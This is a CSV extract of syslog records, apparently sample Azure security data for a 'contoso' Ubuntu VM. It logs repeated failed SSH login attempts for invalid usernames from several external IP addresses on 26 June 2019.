+6920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:17,UbuntuDevEnv,2019-06-26 17:11:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,46045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:17,UbuntuDevEnv,2019-06-26 17:11:17,auth,UbuntuDevEnv,info,Invalid user pimp from 74.94.246.82 port 53932,46047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pimp,74.94.246.8,53932,,
+6922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:17,UbuntuDevEnv,2019-06-26 17:11:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:17,UbuntuDevEnv,2019-06-26 17:11:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,46047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:19,UbuntuDevEnv,2019-06-26 17:11:19,auth,UbuntuDevEnv,info,Failed password for invalid user 2 from 77.237.69.165 port 53436 ssh2,46045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,77.237.69.1,53436,,
+6925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:19,UbuntuDevEnv,2019-06-26 17:11:19,auth,UbuntuDevEnv,info,Failed password for invalid user pimp from 74.94.246.82 port 53932 ssh2,46047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pimp,74.94.246.8,53932,,
+6926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:19,UbuntuDevEnv,2019-06-26 17:11:19,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 53436:11: Bye Bye [preauth],46045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,53436,,
+6927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:19,UbuntuDevEnv,2019-06-26 17:11:19,auth,UbuntuDevEnv,info,Disconnected from invalid user 2 77.237.69.165 port 53436 [preauth],46045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,77.237.69.1,53436,,
+6928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:19,UbuntuDevEnv,2019-06-26 17:11:19,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 53932:11: Bye Bye [preauth],46047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,53932,,
+6929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:19,UbuntuDevEnv,2019-06-26 17:11:19,auth,UbuntuDevEnv,info,Disconnected from invalid user pimp 74.94.246.82 port 53932 [preauth],46047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pimp,74.94.246.8,53932,,
+6930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:41,UbuntuDevEnv,2019-06-26 17:11:40,auth,UbuntuDevEnv,info,Invalid user sshtest from 35.154.19.93 port 60046,46136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshtest,35.154.19.9,60046,,
+6931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:41,UbuntuDevEnv,2019-06-26 17:11:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:41,UbuntuDevEnv,2019-06-26 17:11:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:42,UbuntuDevEnv,2019-06-26 17:11:42,auth,UbuntuDevEnv,info,Invalid user stuttgart from 81.0.212.18 port 48089,46142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stuttgart,81.0.212.1,48089,,
+6934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:42,UbuntuDevEnv,2019-06-26 17:11:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,46142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:42,UbuntuDevEnv,2019-06-26 17:11:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:43,UbuntuDevEnv,2019-06-26 17:11:42,auth,UbuntuDevEnv,info,Failed password for invalid user sshtest from 35.154.19.93 port 60046 ssh2,46136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshtest,35.154.19.9,60046,,
+6937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:43,UbuntuDevEnv,2019-06-26 17:11:42,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 60046:11: Normal Shutdown, Thank you for playing [preauth]",46136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60046,,
+6938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:43,UbuntuDevEnv,2019-06-26 17:11:42,auth,UbuntuDevEnv,info,Disconnected from invalid user sshtest 35.154.19.93 port 60046 [preauth],46136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshtest,35.154.19.9,60046,,
+6939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:45,UbuntuDevEnv,2019-06-26 17:11:44,auth,UbuntuDevEnv,info,Failed password for invalid user stuttgart from 81.0.212.18 port 48089 ssh2,46142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stuttgart,81.0.212.1,48089,,
+6940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:45,UbuntuDevEnv,2019-06-26 17:11:44,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 48089:11: Bye Bye [preauth],46142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,48089,,
+6941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:11:45,UbuntuDevEnv,2019-06-26 17:11:44,auth,UbuntuDevEnv,info,Disconnected from invalid user stuttgart 81.0.212.18 port 48089 [preauth],46142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stuttgart,81.0.212.1,48089,,
+6942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:07,UbuntuDevEnv,2019-06-26 17:12:07,auth,UbuntuDevEnv,info,Invalid user nur from 171.8.199.77 port 36432,46227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nur,171.8.199.7,36432,,
+6943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:07,UbuntuDevEnv,2019-06-26 17:12:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,46227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:07,UbuntuDevEnv,2019-06-26 17:12:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:09,UbuntuDevEnv,2019-06-26 17:12:09,auth,UbuntuDevEnv,info,Failed password for invalid user nur from 171.8.199.77 port 36432 ssh2,46227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nur,171.8.199.7,36432,,
+6946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:09,UbuntuDevEnv,2019-06-26 17:12:09,auth,UbuntuDevEnv,info,Disconnected from invalid user nur 171.8.199.77 port 36432 [preauth],46227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nur,171.8.199.7,36432,,
+6947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:09,UbuntuDevEnv,2019-06-26 17:12:09,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 36432:11: Bye Bye [preauth],46227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,36432,,
+6948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:13,UbuntuDevEnv,2019-06-26 17:12:13,auth,UbuntuDevEnv,info,Invalid user sshuser from 35.154.19.93 port 35104,46253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshuser,35.154.19.9,35104,,
+6949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:13,UbuntuDevEnv,2019-06-26 17:12:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:13,UbuntuDevEnv,2019-06-26 17:12:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:16,UbuntuDevEnv,2019-06-26 17:12:15,auth,UbuntuDevEnv,info,Failed password for invalid user sshuser from 35.154.19.93 port 35104 ssh2,46253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshuser,35.154.19.9,35104,,
+6952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:16,UbuntuDevEnv,2019-06-26 17:12:15,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 35104:11: Normal Shutdown, Thank you for playing [preauth]",46253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35104,,
+6953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:16,UbuntuDevEnv,2019-06-26 17:12:15,auth,UbuntuDevEnv,info,Disconnected from invalid user sshuser 35.154.19.93 port 35104 [preauth],46253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshuser,35.154.19.9,35104,,
+6954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:40,UbuntuDevEnv,2019-06-26 17:12:39,auth,UbuntuDevEnv,info,Invalid user postgres from 206.189.188.223 port 44976,46352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,206.189.188.2,44976,,
+6955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:40,UbuntuDevEnv,2019-06-26 17:12:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.188.223,46352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.188.2,,0,
+6956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:40,UbuntuDevEnv,2019-06-26 17:12:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:41,UbuntuDevEnv,2019-06-26 17:12:41,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 206.189.188.223 port 44976 ssh2,46352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,206.189.188.2,44976,,
+6958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:41,UbuntuDevEnv,2019-06-26 17:12:41,auth,UbuntuDevEnv,info,"Received disconnect from 206.189.188.223 port 44976:11: Normal Shutdown, Thank you for playing [preauth]",46352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.188.2,44976,,
+6959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:41,UbuntuDevEnv,2019-06-26 17:12:41,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 206.189.188.223 port 44976 [preauth],46352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,206.189.188.2,44976,,
+6960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:42,UbuntuDevEnv,2019-06-26 17:12:41,auth,UbuntuDevEnv,info,Invalid user ubuntu from 77.237.69.165 port 60623,46357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,77.237.69.1,60623,,
+6961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:42,UbuntuDevEnv,2019-06-26 17:12:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:42,UbuntuDevEnv,2019-06-26 17:12:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,46357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:43,UbuntuDevEnv,2019-06-26 17:12:43,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 77.237.69.165 port 60623 ssh2,46357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,77.237.69.1,60623,,
+6964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:44,UbuntuDevEnv,2019-06-26 17:12:43,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 77.237.69.165 port 60623 [preauth],46357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,77.237.69.1,60623,,
+6965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:44,UbuntuDevEnv,2019-06-26 17:12:43,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 60623:11: Bye Bye [preauth],46357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,60623,,
+6966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:47,UbuntuDevEnv,2019-06-26 17:12:47,auth,UbuntuDevEnv,info,Invalid user rdp from 35.154.19.93 port 38400,46376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rdp,35.154.19.9,38400,,
+6967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:47,UbuntuDevEnv,2019-06-26 17:12:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:47,UbuntuDevEnv,2019-06-26 17:12:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:48,UbuntuDevEnv,2019-06-26 17:12:48,auth,UbuntuDevEnv,info,Invalid user mdpi from 74.94.246.82 port 42886,46381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdpi,74.94.246.8,42886,,
+6970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:48,UbuntuDevEnv,2019-06-26 17:12:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:48,UbuntuDevEnv,2019-06-26 17:12:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,46381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:50,UbuntuDevEnv,2019-06-26 17:12:49,auth,UbuntuDevEnv,info,Failed password for invalid user rdp from 35.154.19.93 port 38400 ssh2,46376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rdp,35.154.19.9,38400,,
+6973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:50,UbuntuDevEnv,2019-06-26 17:12:49,auth,UbuntuDevEnv,info,Disconnected from invalid user rdp 35.154.19.93 port 38400 [preauth],46376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rdp,35.154.19.9,38400,,
+6974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:50,UbuntuDevEnv,2019-06-26 17:12:49,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 38400:11: Normal Shutdown, Thank you for playing [preauth]",46376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38400,,
+6975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:51,UbuntuDevEnv,2019-06-26 17:12:50,auth,UbuntuDevEnv,info,Failed password for invalid user mdpi from 74.94.246.82 port 42886 ssh2,46381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdpi,74.94.246.8,42886,,
+6976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:51,UbuntuDevEnv,2019-06-26 17:12:50,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 42886:11: Bye Bye [preauth],46381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,42886,,
+6977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:51,UbuntuDevEnv,2019-06-26 17:12:50,auth,UbuntuDevEnv,info,Disconnected from invalid user mdpi 74.94.246.82 port 42886 [preauth],46381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mdpi,74.94.246.8,42886,,
+6978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:53,UbuntuDevEnv,2019-06-26 17:12:53,auth,UbuntuDevEnv,info,Invalid user public from 111.230.29.17 port 36088,46393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,111.230.29.1,36088,,
